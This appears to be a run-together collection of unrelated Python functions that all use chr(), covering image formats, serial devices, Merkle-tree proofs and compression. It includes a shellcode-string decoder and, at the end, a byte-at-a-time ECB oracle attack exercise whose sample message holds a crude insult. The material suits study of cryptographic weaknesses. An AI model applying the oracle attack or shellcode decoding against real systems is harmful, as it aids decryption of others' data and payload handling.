def getheader(im, info=None): """Return a list of strings representing a GIF header""" optimize = info and info.get("optimize", 0) s = [ "GIF87a" + o16(im.size[0]) # magic + o16(im.size[1]) # size + chr(7 + 128) + chr(0) # flags: bits + palette + chr(0) # background # reserved/aspect ] if optimize: # minimize color palette i = 0 maxcolor = 0 for count in im.histogram(): if count: maxcolor = i i = i + 1 else: maxcolor = 256 # global palette if im.mode == "P": # colour palette s.append(im.im.getpalette("RGB")[: maxcolor * 3]) else: # greyscale for i in range(maxcolor): s.append(chr(i) * 3) return s
def deentity(data,mode=0): """Remove HTML entities from a string. Modes: 0: Fast / common entities only (default) 1: Comprehensive (slow) 2: Syntax-critical escapes only 3: Whole-file mode (skip syntax-critical escapes) """ # The level of overhead which results from inefficiencies in this function is phenomenal. # TODO: convert this entire function to do it properly or at least using a compiled regex. from html.entities import name2codepoint,codepoint2name # # 0: Fast, 1: Comprehensive, 2: Syntax-critical only, 3: Whole-file mode (skip syntax-critical) if mode==0: foci = ('lt', 'gt', 'quot', 'nbsp', 'lsquo', 'rsquo', 'ldquo', 'rdquo', 'ndash', 'hellip', 'eacute') elif mode in (1,3): foci = list(name2codepoint.keys()) elif mode == 2: foci = ('lt', 'gt') for name in foci: if name != "amp": if (mode != 3) or (name not in ('lt', 'gt')): data = data.replace("&" + name + ";", chr(name2codepoint[name])) if mode in (0, 2): data = data.replace("'", chr(39)) elif mode in (1, ):#3): for number in range(0x100): name = "#"+str(number) data = data.replace("&" + name + ";", chr(number)) if mode != 3: data = data.replace("&", "&") return data
def intlist_to_bytes(xs): if not xs: return b'' if isinstance(chr(0), bytes): # Python 2 return ''.join([chr(x) for x in xs]) else: return bytes(xs)
def createPositionerSetup(self, list): nim = self.nimConfig list.append(getConfigListEntry(_("Longitude"), nim.longitude)) list.append(getConfigListEntry(" ", nim.longitudeOrientation)) list.append(getConfigListEntry(_("Latitude"), nim.latitude)) list.append(getConfigListEntry(" ", nim.latitudeOrientation)) if SystemInfo["CanMeasureFrontendInputPower"]: self.advancedPowerMeasurement = getConfigListEntry(_("Use power measurement"), nim.powerMeasurement) list.append(self.advancedPowerMeasurement) if nim.powerMeasurement.getValue(): list.append(getConfigListEntry(_("Power threshold in mA"), nim.powerThreshold)) self.turningSpeed = getConfigListEntry(_("Rotor turning speed"), nim.turningSpeed) list.append(self.turningSpeed) if nim.turningSpeed.getValue() == "fast epoch": self.turnFastEpochBegin = getConfigListEntry(_("Begin time"), nim.fastTurningBegin) self.turnFastEpochEnd = getConfigListEntry(_("End time"), nim.fastTurningEnd) list.append(self.turnFastEpochBegin) list.append(self.turnFastEpochEnd) else: if nim.powerMeasurement.getValue(): nim.powerMeasurement.setValue(False) nim.powerMeasurement.save() list.append(getConfigListEntry(_("Tuning step size") + " [" + chr(176) + "]", nim.tuningstepsize)) list.append(getConfigListEntry(_("Memory positions"), nim.rotorPositions)) list.append(getConfigListEntry(_("Horizontal turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedH)) list.append(getConfigListEntry(_("Vertical turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedV))
def __decrypt_file(self, private_d, public_n, keys, path_to_file, CRT, k): if CRT: pool = Pool(processes = k) promises = [] decrpted_data = '' with open(path_to_file, 'r') as f: encrypted_data = f.read() encrypted_data_chunks = list(map(''.join, zip(*[iter(encrypted_data)]*len(str(public_n))))) for i in range(len(encrypted_data_chunks)): stripped = encrypted_data_chunks[i].lstrip('0') if CRT: promise = pool.apply_async(self.compute_part_of_message, args=(stripped, keys, i)) promises.append(promise) else: decrpted_data += chr(self.__decrypt_message(stripped, private_d, public_n)) if CRT: results = [promise.get() for promise in promises] decrypted_sorted = sorted(results, key = lambda x: x[1]) for data in decrypted_sorted: decrpted_data += chr(data[0]) if CRT: pool.close() with open(path_to_file + '.dec', 'w') as f: f.write(decrpted_data) return decrpted_data
def random_password(bit=12): """ generate a password randomly which include numbers, letters and sepcial characters """ numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'] small_letters = [chr(i) for i in range(97, 123)] cap_letters = [chr(i) for i in range(65, 91)] special = ['@', '#', '$', '%', '^', '&', '*', '-'] passwd = [] for i in range(bit/4): passwd.append(random.choice(numbers)) passwd.append(random.choice(small_letters)) passwd.append(random.choice(cap_letters)) passwd.append(random.choice(special)) for i in range(bit%4): passwd.append(random.choice(numbers)) passwd.append(random.choice(small_letters)) passwd.append(random.choice(cap_letters)) passwd.append(random.choice(special)) passwd = passwd[:bit] random.shuffle(passwd) return ''.join(passwd)
def main(stdscr): stdscr.addstr(0,2,"Curses example: h)left, l)right, q)uit") horzPosition = 19 delta = 0 while True: stdscr.refresh() stdscr.nodelay(1) while True: a_char_code = stdscr.getch() if a_char_code != -1: break stdscr.addstr(3,horzPosition," ") horzPosition += delta if horzPosition < 0: horzPosition = 0 elif horzPosition > 39: horzPosition = 39 stdscr.addstr(3,horzPosition,'@') stdscr.refresh() time.sleep(0.02) stdscr.nodelay(0) if chr(a_char_code) == "q": break elif chr(a_char_code) == "h": delta = -1 elif chr(a_char_code) == "l": delta = +1
def report_data(self): """""" if self.report_mode == 0x30: payload = self.buttons_pack() elif self.report_mode == 0x31: payload = self.buttons_pack() + self.accel_pack() elif self.report_mode == 0x32: payload = self.buttons_pack() + self.ext8_pack() elif self.report_mode == 0x33: payload = self.buttons_pack() + self.accel_pack() + self.ir12_pack() elif self.report_mode == 0x34: payload = self.buttons_pack() + self.ext19_pack() elif self.report_mode == 0x35: payload = self.buttons_pack() + self.accel_pack() + self.ext16_pack() elif self.report_mode == 0x36: payload = self.buttons_pack() + self.ir10_pack() + self.ext9_pack() elif self.report_mode == 0x37: payload = self.buttons_pack() + self.accel_pack() + self.ir10_pack() + self.ext6_pack() elif self.report_mode == 0x3d: payload = self.ext21_pack() elif self.report_mode == 0x3e or self.report_mode == 0x3f: print(("*** TODO: report_mode " + hex(self.report_mode))) else: print(("*** Unhandled report mode: " + self.report_mode)) return 0 return chr(0xA1) + chr(self.report_mode) + payload
def __init__(self, fp): self.palette = map(lambda i: chr(i)*3, range(256)) if fp.readline()[:12] != "GIMP Palette": raise SyntaxError, "not a GIMP palette file" i = 0 while i <= 255: s = fp.readline() if not s: break # skip fields and comment lines if re.match("\w+:|#", s): continue if len(s) > 100: raise SyntaxError, "bad palette file" v = tuple(map(int, string.split(s)[:3])) if len(v) != 3: raise ValueError, "bad palette entry" if 0 <= i <= 255: self.palette[i] = chr(v[0]) + chr(v[1]) + chr(v[2]) i = i + 1 self.palette = string.join(self.palette, "")
def createPositionerSetup(self, list): nim = self.nimConfig list.append(getConfigListEntry(_("Longitude"), nim.longitude)) list.append(getConfigListEntry(" ", nim.longitudeOrientation)) list.append(getConfigListEntry(_("Latitude"), nim.latitude)) list.append(getConfigListEntry(" ", nim.latitudeOrientation)) if SystemInfo["CanMeasureFrontendInputPower"]: self.advancedPowerMeasurement = getConfigListEntry(_("Use power measurement"), nim.powerMeasurement) list.append(self.advancedPowerMeasurement) if nim.powerMeasurement.value: list.append(getConfigListEntry(_("Power threshold in mA"), nim.powerThreshold)) self.turningSpeed = getConfigListEntry(_("Rotor turning speed"), nim.turningSpeed) list.append(self.turningSpeed) if nim.turningSpeed.value == "fast epoch": self.turnFastEpochBegin = getConfigListEntry(_("Begin time"), nim.fastTurningBegin) self.turnFastEpochEnd = getConfigListEntry(_("End time"), nim.fastTurningEnd) list.append(self.turnFastEpochBegin) list.append(self.turnFastEpochEnd) else: if nim.powerMeasurement.value: nim.powerMeasurement.value = False nim.powerMeasurement.save() if not hasattr(self, 'additionalMotorOptions'): self.additionalMotorOptions = ConfigYesNo(False) self.showAdditionalMotorOptions = getConfigListEntry(_("Extra motor options"), self.additionalMotorOptions) self.list.append(self.showAdditionalMotorOptions) if self.additionalMotorOptions.value: self.list.append(getConfigListEntry(" " + _("Horizontal turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedH)) self.list.append(getConfigListEntry(" " + _("Vertical turning speed") + " [" + chr(176) + "/sec]", nim.turningspeedV)) self.list.append(getConfigListEntry(" " + _("Turning step size") + " [" + chr(176) + "]", nim.tuningstepsize)) self.list.append(getConfigListEntry(" " + _("Max memory positions"), nim.rotorPositions))
def requestDataBlock(self, block): if self.packetCounter == 0xFF: self.packetCounter = 0 else: self.packetCounter += 1 self.ser.write("\x04") packet = self.ser.read(1) packet = self.ser.read(1) # this is the 0x04 kompliment self.ser.write(chr(self.packetCounter)) packet = self.ser.read(1) packet = self.ser.read(1) # this is the kompliment of the self.packetCounter self.ser.write("\x29") # this is the command for a grp reading packet = self.ser.read(1) packet = self.ser.read(1) # this is the compliment of 0x29 # now send the grp ID number -- self.ser.write(chr(block)) packet = self.ser.read(1) packet = self.ser.read(1) # should be compliment - yet again self.ser.write("\x03") packet = self.ser.read(1)
def packed_attributes (self,addpath): if not self.nlris: return mpnlri = {} for nlri in self.nlris: if nlri.nexthop: # .packed and not .pack() # we do not want a next_hop attribute packed (with the _attribute()) but just the next_hop itself if nlri.safi.has_rd(): nexthop = chr(0)*8 + nlri.nexthop.packed else: nexthop = nlri.nexthop.packed else: # EOR fo not and Flow may not have any next_hop nexthop = '' # mpunli[afi,safi][nexthop] = nlri mpnlri.setdefault((nlri.afi.pack(),nlri.safi.pack()),{}).setdefault(nexthop,[]).append(nlri.pack(addpath)) for (pafi,psafi),data in mpnlri.iteritems(): for nexthop,nlris in data.iteritems(): yield self._attribute( pafi + psafi + chr(len(nexthop)) + nexthop + chr(0) + ''.join(nlris) )
def performcheck(self, expected): line = "" char = "" while char != chr(62): # '>' char = self.read(1) if char == "": raise Exception("No proper answer from MCU") if char == chr(13) or char == chr(10): # LF or CR if line != "": line = line.strip() if line + "\r" == expected and self.verbose: sys.stdout.write(" -> ok") else: if line[:4] == "lua:": sys.stdout.write("\r\n\r\nLua ERROR: %s" % line) raise Exception("ERROR from Lua interpreter\r\n\r\n") else: expected = expected.split("\r")[0] sys.stdout.write("\r\n\r\nERROR") sys.stdout.write("\r\n send string : '%s'" % expected) sys.stdout.write("\r\n expected echo : '%s'" % expected) sys.stdout.write("\r\n but got answer : '%s'" % line) sys.stdout.write("\r\n\r\n") raise Exception("Error sending data to MCU\r\n\r\n") line = "" else: line += char
def sendPixel(self,r,g,b): """Sends the next pixel data triplet in RGB format. Values are clamped to 0-254 automatically. Throws a RuntimeException if [ledCount] pixels are already set """ data = "" if r < 0: r = 0 if g < 0: g = 0 if b < 0: b = 0 if r >= 255: r = 254 if g >= 255: g = 254 if b >= 255: b = 254 data = chr(r) + chr(g) + chr(b) if self.position < self.ledCount: if self.buffered: self.buf += data else: self.serial.write(data) self.serial.flush() self.position += 1 else: raise RuntimeError("Attempting to set pixel outside range!")
def zen_of_python(): interactive() s = """Gur Mra bs Clguba, ol Gvz Crgref Ornhgvshy vf orggre guna htyl. Rkcyvpvg vf orggre guna vzcyvpvg. Fvzcyr vf orggre guna pbzcyrk. Pbzcyrk vf orggre guna pbzcyvpngrq. Syng vf orggre guna arfgrq. Fcnefr vf orggre guna qrafr. Ernqnovyvgl pbhagf. Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf. Nygubhtu cenpgvpnyvgl orngf chevgl. Reebef fubhyq arire cnff fvyragyl. Hayrff rkcyvpvgyl fvyraprq. Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff. Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg. Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu. Abj vf orggre guna arire. Nygubhtu arire vf bsgra orggre guna *evtug* abj. Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn. Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn. Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!""" d = {} for c in (65, 97): for i in range(26): d[chr(i+c)] = chr((i+13) % 26 + c) switch_to_buffer("*The Zen of Python*") insert("".join([d.get(c, c) for c in s]))
def OidFromAttid(prefixTable, attr): # separate the ATTRTYP into two parts upperWord = attr / 65536 lowerWord = attr % 65536 # search in the prefix table to find the upperWord, if found, # construct the binary OID by appending lowerWord to the end of # found prefix. binaryOID = None for j, item in enumerate(prefixTable): if item["ndx"] == upperWord: binaryOID = item["prefix"]["elements"][: item["prefix"]["length"]] if lowerWord < 128: binaryOID.append(chr(lowerWord)) else: if lowerWord >= 32768: lowerWord -= 32768 binaryOID.append(chr(((lowerWord / 128) % 128) + 128)) binaryOID.append(chr(lowerWord % 128)) break if binaryOID is None: return None return str(decoder.decode("\x06" + chr(len(binaryOID)) + "".join(binaryOID), asn1Spec=univ.ObjectIdentifier())[0])
def compress(uncompressed): dict_size = 256 dictionary = dict((chr(i), chr(i)) for i in xrange(dict_size)) w = "" result = [] for c in uncompressed: wc = w + c if wc in dictionary: w = wc else: result.append(dictionary[w]) dictionary[wc] = dict_size dict_size += 1 w = c if w: result.append(dictionary[w]) return result
def __init__(self, simple = False ): #Denmark (incl. Faroe island and Greenland ) self.prefixes = ['OU', 'OV', 'OW', 'OX', 'OY', 'OZ', 'XP', '5P', '5Q'] #Norway self.prefixes += ['JW', 'JX', 'LA', 'LN', 'LB', 'LC', 'LD', 'LE', 'LF', 'LG', 'LH', 'LI', 'LJ', 'LK', 'LL', 'LM', 'LN', '3Y'] # Sweden self.prefixes += ['SA', 'SB', 'SC', 'SD', 'SE', 'SF', 'SG', 'SH', 'SI', 'SJ', 'SK', 'SL', 'SM', '7S', '8S'] # Germany # DA - DR for l in range(ord('A'),ord('S')): tmp = ['D' + chr(l)] self.prefixes += tmp # GB et. al self.prefixes += 'G' for l in range(ord('A'),ord('Z')+1): tmp = ['2'+chr(l)] self.prefixes += tmp for l in range(ord('A'),ord('Z')+1): tmp = ['G'+chr(l)] + ['M' +chr( l ) ] self.prefixes += tmp self.prefixes += ['VP', 'VQ', 'VS'] for l in range(ord('A'),ord('I')+1): tmp = ['P'+chr(l)] self.prefixes += tmp # Ireland ( is _not_ GB ;) ) self.prefixes += [ 'EI', 'EJ'] # Spain self.prefixes += ['AM', 'AN', 'AO'] for l in range(ord('A'),ord('H')+1): tmp = ['E'+chr(l)] self.prefixes += tmp # Switzerland ( and Liechtenstein ) self.prefixes += ['HB', 'HE'] # Poland self.prefixes += ['3Z', 'HF'] for l in range(ord('N'),ord('R')+1): tmp = ['S'+chr(l)] self.prefixes += tmp # France (better remember them or they will get mad ) self.prefixes += ['F', 'FU', 'FV', 'HW', 'HX', 'HY', 'TH', 'TQ' ] for l in range(ord('V'),ord('X')+1): tmp = ['T'+chr(l)] self.prefixes += tmp # This is for Belgium for l in range(ord('N'),ord('T')+1): tmp = ['O'+chr(l)] self.prefixes += tmp # Chekoslovakia (yes I know they're two different countries ) for l in range(ord('K'),ord('M')+1): tmp = ['O'+chr(l)] self.prefixes += tmp # Italy (I cant't figure out their system, so these are the ones that gets picked self.prefixes += ['I', 'IK','IA'] if ( simple == True ): self.prefixes = ['OZ','LA','SM','G','GM', 'DA', 'DB', 'DC', 'DD','DJ','DK','OY', 'OX', 'F', 'I', 'HB', 'SP', 'EA', 'EI', 'ON', 'OK', 'OM']
def main(): phrases_map={} build_phrase_map(phrases_map) fPhrase=codecs.open("murphytalk_phrase.dat","wt","utf-8") fPhrase.write("MurphyTalk Phrase Table\nVer 0.03\n"); fIndex=open("murphytalk_phrase_idx.txt","wt") fIndex.write("MurphyTalk Pinyin Phrase Index Table\nVer 0.03\n"); keys=phrases_map.keys() freq=chr(0)+chr(0)+chr(0)+chr(0) keys.sort() for k in keys: fIndex.write(k); fIndex.write("\t%d\t"%len(phrases_map[k])); for phrase in phrases_map[k]: #record offset in phrase file into index file fIndex.write("%d "%fPhrase.tell()) #write frequency into phrase file (uint32,4 bytes) #we don't use the codec but its underlying file stream here fPhrase.stream.write(freq) #write phrase text into phrase file fPhrase.write("%s "%phrase) fIndex.write("\n"); fIndex.close() fPhrase.close()
def pack_ascii(text): i = 0 retstr = "" while(i+4 <= len(text)): ret = [0,0,0] ret[0] = (ord(text[i]) << 2) & 252 ret[0] = ret[0] | (((ord(text[i+1]) << 2) & 192) >> 6 ) ret[1] = (ord(text[i+1]) << 4) & 240 ret[1] = ret[1] | (((ord(text[i+2]) << 2) & 240) >> 4) ret[2] = ((ord(text[i+2]) << 6) & 192) | (ord(text[i+3]) & 0x3F) i = i + 4 retstr = retstr + chr(ret[0]) + chr(ret[1]) + chr(ret[2]) #if(i < len(text)): # ret = ret + "\x00" while(i < len(text)): retstr = retstr + text[i] i = i + 1 return retstr
def cross_check_consistency_against_opensource_algorithm(first, second, first_hash, second_hash, consistency): try: node = first - 1 last_node = second - 1 while node & 1: node >>= 1 last_node >>= 1 p = iter(consistency) if node: old_hash = p.next() else: # old was 2 ** n old_hash = first_hash new_hash = old_hash while node: if node & 1: x = p.next() old_hash = sha256(chr(1) + x + old_hash).digest() new_hash = sha256(chr(1) + x + new_hash).digest() elif node < last_node: new_hash = sha256(chr(1) + new_hash + p.next()).digest() node >>= 1 last_node >>= 1 while last_node: new_hash = sha256(chr(1) + new_hash + p.next()).digest() last_node >>= 1 for remaining in p: return False # we shouldn't have any elements left over return old_hash == first_hash and new_hash == second_hash except StopIteration: return False # ran out of elements
def cross_check_inclusion_via_opensource(hash, leaf_index, audit_path, tree_size, root_hash): audit_path = audit_path[:] node_index = leaf_index calculated_hash = hash last_node = tree_size - 1 while last_node > 0: if not audit_path: return False if node_index % 2: audit_hash = audit_path.pop(0) calculated_hash = sha256(chr(1) + audit_hash + calculated_hash).digest() elif node_index < last_node: audit_hash = audit_path.pop(0) calculated_hash = sha256(chr(1) + calculated_hash + audit_hash).digest() # node_index == last_node and node_index is even: A sibling does # not exist. Go further up the tree until node_index is odd so # calculated_hash will be used as the right-hand operand. node_index //= 2 last_node //= 2 if audit_path: return False return calculated_hash == root_hash
def decode_1033(pkt): # Don't really care about any of this stuff at this stage.. des = '' sno = '' rec = '' ver = '' rsn = '' stat_id = pkt.read(12).uint n = pkt.read(8).uint for i in range(n): des = des + chr(pkt.read(8).uint) setup = pkt.read(8).uint n = pkt.read(8).uint for i in range(n): sno = sno + chr(pkt.read(8).uint) n = pkt.read(8).uint for i in range(n): rec = rec + chr(pkt.read(8).uint) n = pkt.read(8).uint for i in range(n): ver = ver + chr(pkt.read(8).uint) n = pkt.read(8).uint for i in range(n): rsn = rsn + chr(pkt.read(8).uint)
def mkwave(octave): global sinewave, nowave sinewave = '' for i in range(100): val = int(math.sin(math.pi * float(i) * octave / 50.0) * 30000) sinewave = sinewave + chr((val >> 8) & 255) + chr(val & 255) nowave = '\0' * 200
def populate(self): self._textures = [] fname = self.filename if __debug__: Logger.trace('Image: %r, populate to textures (%d)' % (fname, len(self._data))) for count in range(len(self._data)): # first, check if a texture with the same name already exist in the # cache chr = type(fname) uid = chr(u'%s|%d|%d') % (fname, self._mipmap, count) texture = Cache.get('kv.texture', uid) # if not create it and append to the cache if texture is None: imagedata = self._data[count] source = '{}{}|'.format( 'zip|' if fname.endswith('.zip') else '', self._nocache) imagedata.source = chr(source) + uid texture = Texture.create_from_data( imagedata, mipmap=self._mipmap) if not self._nocache: Cache.append('kv.texture', uid, texture) if imagedata.flip_vertical: texture.flip_vertical() # set as our current texture self._textures.append(texture) # release data if ask if not self.keep_data: self._data[count].release_data()
def hashNote(self,n): ''' Encodes a note >>> hasher = omr.correctors.MeasureHash() >>> n = note.Note('C') >>> n.duration.type = 'quarter' >>> hasher.hashNote(n) 'P' >>> n2 = note.Note('C') >>> n2.duration.type = 'half' >>> hasher.hashNote(n2) 'Z' >>> n3 = note.Note('C', quarterLength=1.5) >>> hasher.hashNote(n3) 'V' ''' duration1to127 = self.hashQuarterLength(n.duration.quarterLength) if duration1to127%2==0 and duration1to127>0: byteEncoding = chr(duration1to127) elif duration1to127%2==1 and duration1to127>0: byteEncoding = chr(duration1to127+1) elif duration1to127 < 0: byteEncoding = chr(1) return byteEncoding
def startKinect(self): """ demarrer le prog C++ de la Kinect """ self.prog = os.startfile("C:\Users\Matthieu\Documents\MI12\Projet_test\Kinect_test\Release\Kinect_test.exe") time.sleep(2) self.shm = mmap.mmap(0, 512, "Local\\Test") #You should "open" the memory map file instead of attempting to create it.. if self.shm: #self.self.shm.write(bytes("5", 'UTF-8')); #self.shm.write(bytes("Hello", 'UTF-8')) time.sleep(0.5) self.shm.write_byte(chr(1)) self.shm.seek(1) print "wrote 1" b = chr(0) while ord(b) == 0: b = self.shm.read_byte() self.shm.seek(1) print "recieved ", ord(b) time.sleep(0.1) print "Kinect programme pret pour enregistrement" self.isKinectConnected = True if self.isAndroidConnected: self.button_start_recording.config(state="normal") # init de la com self.shm.seek(0) self.shm.write_byte(chr(0)) # isTracking => 0 self.shm.write_byte(chr(0)) # isRecording => 0
def build_shellcode(self, s): i = 0 sc = list() while i < len(s): if s[i] == '"': i += 1 continue if s[i] == '%': if (i + 6) <= len(s) and s[i + 1] == 'u': currchar = int(s[i + 2: i + 4], 16) nextchar = int(s[i + 4: i + 6], 16) sc.append(chr(nextchar)) sc.append(chr(currchar)) i += 6 elif (i + 3) <= len(s) and s[i + 1] == 'u': currchar = int(s[i + 2: i + 4], 16) sc.append(chr(currchar)) i += 3 else: sc.append(s[i]) i += 1 else: sc.append(s[i]) i += 1 return ''.join(sc)
def new_playback_stream(self, path): stream = self.bus.get_object(object_path=str(path)) property_list = stream.Get('org.PulseAudio.Core1.Stream', 'PropertyList', dbus_interface='org.freedesktop.DBus.Properties') pid = ''.join([chr(char) for char in dict(property_list)['application.process.id'][:-1]]) binary = ''.join([chr(char) for char in dict(property_list)['application.process.binary'][:-1]]) name = ''.join([chr(char) for char in dict(property_list)['application.name'][:-1]]) volume = int(stream.Get('org.PulseAudio.Core1.Stream', 'Volume', dbus_interface='org.freedesktop.DBus.Properties')[0]) mute = bool(stream.Get('org.PulseAudio.Core1.Stream', 'Mute', dbus_interface='org.freedesktop.DBus.Properties')) base_volume = int(self.sink0.Get('org.PulseAudio.Core1.Device', 'BaseVolume', dbus_interface='org.freedesktop.DBus.Properties')) print(json.dumps({ 'newStream': { 'pid': pid, 'path': str(path), 'name': name, 'binary': binary, } })) print(json.dumps({ 'streamVolume': { 'path': str(path), 'volume': volume, 'max': base_volume } })) print(json.dumps({ 'streamMute': { 'path': str(path), 'mute': mute, } }))
def check_inclusion_via_rfc_algorithm(hash, leaf_index, audit_path, tree_size, root_hash): # 1. Set "fn" to "leaf_index" and "sn" to "tree_size - 1". fn, sn = leaf_index, tree_size - 1 # 2. Set "r" to "hash". r = hash # 3. For each value "p" in the "audit_path" array: for p in audit_path: # If "LSB(fn)" is set, or if "fn" is equal to "sn", then: if lsb(fn) or (fn == sn): # 1. Set "r" to "HASH(0x01 || p || r)" r = sha256(chr(1) + p + r).digest() # 2. If "LSB(fn)" is not set, then right-shift both "fn" and "sn" # equally until either "LSB(fn)" is set or "fn" is "fn". while not ((fn == 0) or lsb(fn)): fn >>= 1 sn >>= 1 # Otherwise: else: # Set "r" to "HASH(0x01 || r || p)" r = sha256(chr(1) + r + p).digest() # Finally, right-shift both "fn" and "sn" one time. fn >>= 1 sn >>= 1 # 4. Compare "r" against the "root_hash". If they are equal, # then the log has proven the inclusion of "hash". return r == root_hash
def ParseLine(): """ We've got our source line. Now it's time to parse it all. However if we're defining a macro, we take a detour. First we look if it's an empty line or a comment line Then we extract the label field, if any. Then the mnemonic field, and act on its contents. It can be one of three things: A directive, a macro call or a mnemonic. Before executing the lot we also prepare the operand field. """ global Asm, Flags, Label global current_aid_pointer global array_aid, ending_address # JKL dec.Asm.Parse_Pointer = 0 dec.Asm.New_Label = "" dec.Asm.Mnemonic = "" dec.Asm.List_Line = "" dec.Asm.Timing = "" dec.Asm.List_Byte_Cnt = 0 macrolevel = dec.Asm.Local_Index if dec.Asm.Parse_Line == chr(26) + " ": # Ctrl-Z, end mark for DOS files, ignore it return if dec.Asm.Macro_Def != '': # Defining a Macro, add this line to macro macros.DefineMacro() return if dec.Asm.Cond_False == 0: # Conditional assembly is true. Have to assemble this line # Select memory mode # May have changed by previous line if dec.Asm.Memory == 0: dec.Asm.BOL_Address = dec.Asm.PH_Address dec.Asm.List_Address = dec.Asm.PH_Address elif dec.Asm.Memory == 1: dec.Asm.BOL_Address = dec.Asm.RM_Address dec.Asm.List_Address = dec.Asm.RM_Address else: dec.Asm.BOL_Address = dec.Asm.EM_Address dec.Asm.List_Address = dec.Asm.EM_Address if IsComment(): # Do nothing if this line is empty or a comment line return newlabel = GetLabelName() globlab = string.ascii_uppercase + '_' # Legal begin chars of label if len(newlabel) > 0 and (newlabel[0] in globlab): # New global label defined newglobal = True else: # No new global lable defined newglobal = False if NowChar() == ":": # It's a macro label IncParsePointer() if NowChar() != " ": # Can't be a bare : errors.DoError('illlabel', False) return # Dont' bother to continue dec.Asm.New_Label = newlabel if len(newlabel) > 0: # Do a boundary sync if a label is given target.BoundarySync() dec.Asm.Mnemonic = GetMnemonic() if dec.Asm.Mnemonic == "": # No mnemonic means no operand either dec.Asm.Parse_Pointer = 0 else: # Parse the operand field dec.Asm.Parse_Pointer = FindOperandField() if newglobal and dec.Asm.Mnemonic[:3] != '.SE': # Set last assigned global label name, only when not .SE directive dec.Asm.Last_Global = newlabel # Reset macro indexes dec.Asm.Macro_Number = 0 dec.Asm.Local_Index = 0 DoAssemble() # Got all the ingredients, now put them all together if dec.Asm.New_Label != "": AssignLabel(dec.Asm.New_Label, macrolevel) else: # Conditional assembly is false, accept only .DO, .EL and # .FI directives if IsComment(): # Nothing to do in this line, it's a comment return if NowChar() != " ": # A label is declared here, get it but don't bother about syntax dec.Asm.New_Label = GetWord("", "", " ") dec.Asm.Mnemonic = GetMnemonic() #jkl #sys.stdout = sys.__stdout__ if dec.Asm.Mnemonic != "": if dec.Asm.Mnemonic[:3] in (".DO", ".EL", ".FI"): # These are the only directives of interest now dec.Asm.Parse_Pointer = FindOperandField() DoAssemble() #JKL NOX found_list="" print("List_Line=" + str(dec.Asm.List_Line)) if (len(dec.Asm.List_Line)> 0 ): print("found a list line!") found_list=len(dec.Asm.List_Line) if (found_list!=""): # len(dec.Asm.List_Line)> 0): #print(str(hex(dec.Asm.BOL_Address)) + " " +dec.Asm.Mnemonic + " " + dec.Asm.List_Line[8:14] + " " + str(dec.Asm.List_Byte_Cnt) + " ") # TODO ADD LABEL HERE, LINK BACK IN TO NEW ADDITIONAL SYMBOL TABLE array_aid[dec.Asm.BOL_Address]= {'address': dec.Asm.BOL_Address, 'operator': dec.Asm.Mnemonic, 'operand': dec.Asm.List_Line[8:14], 'byte_cnt': dec.Asm.List_Byte_Cnt} print((array_aid[dec.Asm.BOL_Address])) ending_address = dec.Asm.BOL_Address
def append_charval(self, char_number): self.chars.append( chr(char_number) )
def test_makeKeyTokens_(self): # see http://www.w3.org/TR/REC-xml/#d0e804 for a list of valid characters invalidTokens = [] validTokens = [] # all test tokens will be generated by prepending or inserting characters to this token validBase = "valid" # some invalid characters, not allowed anywhere in a token # note that '/' must not be added here because it is taken as a separator by makeKeyTokens_() invalidChars = "+*,;<>|!$%()=?#\x01" # generate the characters that are allowed at the start of a token (and at every other position) validStartChars = ":_" charRanges = [ (ord('a'), ord('z')), (ord('A'), ord('Z')), (0x00F8, 0x02FF), (0x0370, 0x037D), (0x037F, 0x1FFF), (0x200C, 0x200D), (0x2070, 0x218F), (0x2C00, 0x2FEF), (0x3001, 0xD7FF), (0xF900, 0xFDCF), (0xFDF0, 0xFFFD), #(0x10000, 0xEFFFF), while actually valid, these are not yet accepted by makeKeyTokens_() ] for r in charRanges: for c in range(r[0], r[1]): validStartChars += chr(c) # generate the characters that are only allowed inside a token, not at the start validInlineChars = "-.\xB7" charRanges = [ (ord('0'), ord('9')), (0x0300, 0x036F), (0x203F, 0x2040), ] for r in charRanges: for c in range(r[0], r[1]): validInlineChars += chr(c) # test forbidden start characters for c in invalidChars + validInlineChars: invalidTokens.append(c + validBase) # test forbidden inline characters for c in invalidChars: invalidTokens.append(validBase[:4] + c + validBase[4:]) # test each allowed start character for c in validStartChars: validTokens.append(c + validBase) # test each allowed inline character for c in validInlineChars: validTokens.append(validBase[:4] + c + validBase[4:]) logger = QgsApplication.messageLog() logger.messageReceived.connect(self.catchMessage) prj = QgsProject.instance() for token in validTokens: self.messageCaught = False prj.readEntry("test", token) myMessage = "valid token '%s' not accepted" % (token) assert not self.messageCaught, myMessage for token in invalidTokens: self.messageCaught = False prj.readEntry("test", token) myMessage = "invalid token '%s' accepted" % (token) assert self.messageCaught, myMessage logger.messageReceived.disconnect(self.catchMessage)
s=input('Enter Some String:') output='' for x in s: if x.isalpha(): output=output+x previous=x else: newch=chr(ord(previous)+int(x)) output=output+newch print(output)
def xor(data, key): return ''.join(chr(ord(a)^ord(b)) for a, b in zip(data, key))
random_prefix_size = randint(20,100) print random_prefix_size random_prefix = urandom(random_prefix_size) target_message = "Rishabh Singh Aditya tiwari - lodu \Akaye - golu555555555" blocksize = 16 (prefix_size ,unknown_size)= detect_random_prefix_size() print(prefix_size , unknown_size , len(target_message)) num_blocks = unknown_size/blocksize unknown_string = "" extra = blocksize - prefix_size%blocksize skip = prefix_size + extra for num in range(num_blocks): str1 = "A"*(extra+blocksize-1) for i in range(blocksize): test1 = enc_oracle(str1) matching = dict() for j in range(255): str2 = str1 + unknown_string + chr(j) matching[enc_oracle(str2)[skip+num*blocksize:skip+num*blocksize+blocksize]] = str2 tmp1 = test1[skip+num*blocksize:skip+num*blocksize+blocksize] tmp2 = matching[tmp1] new_byte = tmp2[-1] unknown_string=unknown_string+new_byte str1 = str1[1:] print unknown_string
